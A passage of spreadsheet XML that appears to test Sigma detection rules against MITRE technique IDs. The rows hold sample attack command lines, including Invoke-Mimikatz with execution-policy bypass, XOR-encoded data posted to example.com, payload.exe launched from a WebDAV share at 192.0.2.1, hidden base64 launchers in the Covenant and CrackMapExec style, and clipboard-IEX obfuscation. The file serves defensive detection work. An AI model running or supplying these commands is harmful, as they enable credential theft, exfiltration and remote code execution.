      <c r="B4414" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4414" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4414" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4414" s="43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F4414" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4414" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4414" s="43" t="n"/>
      <c r="K4414" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4415" ht="15.75" customHeight="1" s="42">
      <c r="A4415" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B4415" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4415" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4415" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4415" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F4415" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I441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15" s="43" t="n"/>
      <c r="K4415" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4416" ht="15.75" customHeight="1" s="42">
      <c r="A4416" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B4416" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4416" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4416" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4416" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F4416" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I441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4416" s="43" t="n"/>
      <c r="K4416" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4417" ht="15.75" customHeight="1" s="42">
      <c r="A4417" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4417" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C4417" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D4417" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E4417" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F4417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4417" s="43" t="n"/>
      <c r="J4417" s="43" t="n"/>
      <c r="K4417" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4418" ht="15.75" customHeight="1" s="42">
      <c r="A4418" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4418" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C4418" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D4418" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E4418" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext =  @();
$i = 0; while ($i -lt $plaintext.Count) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
 $i++;
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext}</t>
        </is>
      </c>
      <c r="F4418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4418" s="43" t="n"/>
      <c r="J4418" s="43" t="n"/>
      <c r="K4418" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4419" ht="15.75" customHeight="1" s="42">
      <c r="A4419" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4419" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C4419" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D4419" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E4419" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext =  @();
for	($i = 0; $i -lt $plaintext.Count; $i++) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext}</t>
        </is>
      </c>
      <c r="F4419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4419" s="43" t="n"/>
      <c r="J4419" s="43" t="n"/>
      <c r="K4419" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4420" ht="15.75" customHeight="1" s="42">
      <c r="A4420" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4420" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C4420" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D4420" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E4420" s="43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F4420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4420" s="43" t="n"/>
      <c r="J4420" s="43" t="n"/>
      <c r="K4420" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4421" ht="15.75" customHeight="1" s="42">
      <c r="A4421" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4421" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C4421" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D4421" s="43" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E4421" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "net use http://192.0.2.1/share; Start-Process \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F4421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4421" s="43" t="n"/>
      <c r="J4421" s="43" t="n"/>
      <c r="K4421" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4422" ht="15.75" customHeight="1" s="42">
      <c r="A4422" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4422" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C4422" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D4422" s="43" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E4422" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "net use http://192.0.2.1/share; Start-Process \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F4422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4422" s="43" t="n"/>
      <c r="J4422" s="43" t="n"/>
      <c r="K4422" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4423" ht="15.75" customHeight="1" s="42">
      <c r="A4423" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4423" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C4423" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D4423" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E4423" s="43" t="inlineStr">
        <is>
          <t>$o = New-Object IO.MemoryStream; $data = [System.Convert]::FromBase64String('...'); iex ([System.Text.Encoding]::ASCII.GetString($data))</t>
        </is>
      </c>
      <c r="F4423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4423" s="43" t="n"/>
      <c r="J4423" s="43" t="n"/>
      <c r="K4423" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4424" ht="15.75" customHeight="1" s="42">
      <c r="A4424" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4424" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C4424" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D4424" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E4424" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop /"W" H -st $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F4424" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4424" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4424" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4424" s="43" t="n"/>
      <c r="J4424" s="43" t="n"/>
      <c r="K4424" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4425" ht="15.75" customHeight="1" s="42">
      <c r="A4425" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4425" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C4425" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D4425" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E4425" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -NOprofilE /"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F4425" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4425" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4425" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4425" s="43" t="n"/>
      <c r="J4425" s="43" t="n"/>
      <c r="K4425" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4426" ht="15.75" customHeight="1" s="42">
      <c r="A4426" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4426" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C4426" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D4426" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E4426" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcUtiOnpOLIcy Bypass -nop -w H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F4426" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4426" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4426" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4426" s="43" t="n"/>
      <c r="J4426" s="43" t="n"/>
      <c r="K4426" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4427" ht="15.75" customHeight="1" s="42">
      <c r="A4427" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4427" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C4427" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D4427" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E4427" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTiOnpOliCy Bypass /"NoProfile" -"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F4427" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4427" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4427" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4427" s="43" t="n"/>
      <c r="J4427" s="43" t="n"/>
      <c r="K4427" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4428" ht="15.75" customHeight="1" s="42">
      <c r="A4428" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4428" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4428" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4428" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4428" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"NoProfile" -ws Hidden -"EncodedCommand" &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F4428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4428" s="43" t="n"/>
      <c r="J4428" s="43" t="n"/>
      <c r="K4428" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4429" ht="15.75" customHeight="1" s="42">
      <c r="A4429" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4429" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4429" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4429" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4429" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NOPROfIlE -ws Hidden -ENcodedcoMMaNd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F4429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4429" s="43" t="n"/>
      <c r="J4429" s="43" t="n"/>
      <c r="K4429" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4430" ht="15.75" customHeight="1" s="42">
      <c r="A4430" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4430" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4430" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4430" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4430" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTIonPOliCY Bypass -NOPrOFiLe -ws Hidden -enCOdEDcOmmaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F4430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4430" s="43" t="n"/>
      <c r="J4430" s="43" t="n"/>
      <c r="K4430" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4431" ht="15.75" customHeight="1" s="42">
      <c r="A4431" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4431" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4431" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4431" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4431" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -ws Hidden -enc &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F4431" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4431" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4431" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4431" s="43" t="n"/>
      <c r="J4431" s="43" t="n"/>
      <c r="K4431" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4432" ht="15.75" customHeight="1" s="42">
      <c r="A4432" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4432" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4432" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4432" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4432" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop -ws Hidden -eNcoDEDcommaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F4432" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4432" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4432" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4432" s="43" t="n"/>
      <c r="J4432" s="43" t="n"/>
      <c r="K4432" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4433" ht="15.75" customHeight="1" s="42">
      <c r="A4433" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4433" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4433" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4433" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4433" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F4433" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4433" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4433" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4433" s="43" t="n"/>
      <c r="J4433" s="43" t="n"/>
      <c r="K4433" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4434" ht="15.75" customHeight="1" s="42">
      <c r="A4434" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4434" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4434" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4434" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4434" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F4434" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4434" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4434" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4434" s="43" t="n"/>
      <c r="J4434" s="43" t="n"/>
      <c r="K4434" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4435" ht="15.75" customHeight="1" s="42">
      <c r="A4435" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4435" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4435" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4435" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4435" s="43" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F4435" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4435" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4435" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4435" s="43" t="n"/>
      <c r="J4435" s="43" t="n"/>
      <c r="K4435" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4436" ht="15.75" customHeight="1" s="42">
      <c r="A4436" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4436" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4436" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4436" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4436" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c " iex([System.Windows.Forms.Clipboard]::GetText())""</t>
        </is>
      </c>
      <c r="F4436" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4436" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4436" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4436" s="43" t="n"/>
      <c r="J4436" s="43" t="n"/>
      <c r="K4436" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4437" ht="15.75" customHeight="1" s="42">
      <c r="A4437" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4437" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4437" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4437" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4437" s="43" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c " iex([System.Windows.Forms.Clipboard]::GetText())""</t>
        </is>
      </c>
      <c r="F4437" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4437" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4437" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4437" s="43" t="n"/>
      <c r="J4437" s="43" t="n"/>
      <c r="K4437" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4438" ht="15.75" customHeight="1" s="42">
      <c r="A4438" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4438" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4438" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4438" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4438" s="43" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F4438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4438" s="43" t="n"/>
      <c r="J4438" s="43" t="n"/>
      <c r="K4438" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4439" ht="15.75" customHeight="1" s="42">
      <c r="A4439" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4439" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4439" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4439" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4439" s="43" t="inlineStr">
        <is>
          <t>cmd /r "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c " $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())""</t>
        </is>
      </c>
      <c r="F4439" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4439" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4439" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4439" s="43" t="n"/>
      <c r="J4439" s="43" t="n"/>
      <c r="K4439" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4440" ht="15.75" customHeight="1" s="42">
      <c r="A4440" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
